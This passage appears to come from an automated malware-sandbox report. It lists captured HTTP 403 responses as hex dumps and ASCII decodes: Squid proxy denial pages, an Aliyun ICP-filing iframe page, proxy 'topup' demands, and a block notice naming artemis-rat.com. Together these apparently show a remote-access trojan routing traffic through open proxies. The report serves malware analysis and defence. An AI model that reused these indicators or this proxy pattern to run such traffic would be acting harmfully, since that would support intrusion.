2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:19 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:19 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.20Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:19 GMTContent-Type: text/html;charset=utf-8Content-Length: 3661X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from ezproxies.comX-Cache-Lookup: NONE from ezproxies.com:58378Via: 1.1 ezproxies.com (squid/3.5.20)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:19 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:20 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:19 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:19 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:20 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
